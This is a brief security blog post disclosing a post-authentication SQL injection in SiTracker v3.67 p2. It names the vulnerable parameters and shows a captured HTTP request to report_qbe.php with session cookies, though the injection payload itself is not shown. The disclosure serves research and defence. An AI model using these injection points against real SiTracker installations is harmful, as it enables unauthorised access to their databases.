czwartek, 25 czerwca 2020

Postauth SQLi in SiTracker v3.67 p2

Few days ago I tried another VM from TurnKeyLinux - SiTracker (v3.67 p2). Below you will find few notes from the journey. Here we go...

This time we'll start here:

TL;DR - I thought that this (3.67 p2) version is "the new" one - and indeed it is. But since 2013 afaik it was never updated... ;) So, yeah. "The latest" ;D Anyway... ;]

SQLi bug described below is ("mostly focused" ;)) on admin-part-of-webapp. Few reasons of 'why' - you'll find on the screens below:

a) site_edit.php -> typeid, site

b) search_incidents_advanced.php -> search_title

... cleanvar() function in action:

... and so on. ;) So let's get back to our SQL injection for admin user logged-in:

c) report_qbe.php -> param criteriafield:

More precisely:

DIY version for your private legal CTFs only ;)

c@kali:~$ cat test1.txt
POST /report_qbe.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 183
Connection: close
Cookie: sugar_user_theme=SuiteP; ck_login_id_20=1; ck_login_language_20=en_us; Accounts_divs=Accounts_documents_v%3Dtrue%23undefined%3D%23Accounts_accounts_v%3Dtrue%23Accounts_project_v%3Dtrue%23; AOR_Reports_divs=AOR_Reports_aor_scheduled_reports_aor_reports_v%3Dtrue%23undefined%3D%23; PHPSESSID=7a4rcc45nracu0s7vg2alnqeq1; ZMSESSID=nh054rbcptbu3svclu3dbqpvi1; SiTsessionID=fkum2is1ac6m4nit7o7erge8g7
Upgrade-Insecure-Requests: 1

c@kali:~$ ^C

You'll find it here:

Maybe you'll find it useful. ;]

Special thanks goes to my Patreon: Daniel.
You are AWESOME! ;)

See you next time!


Brak komentarzy:

Publikowanie komentarza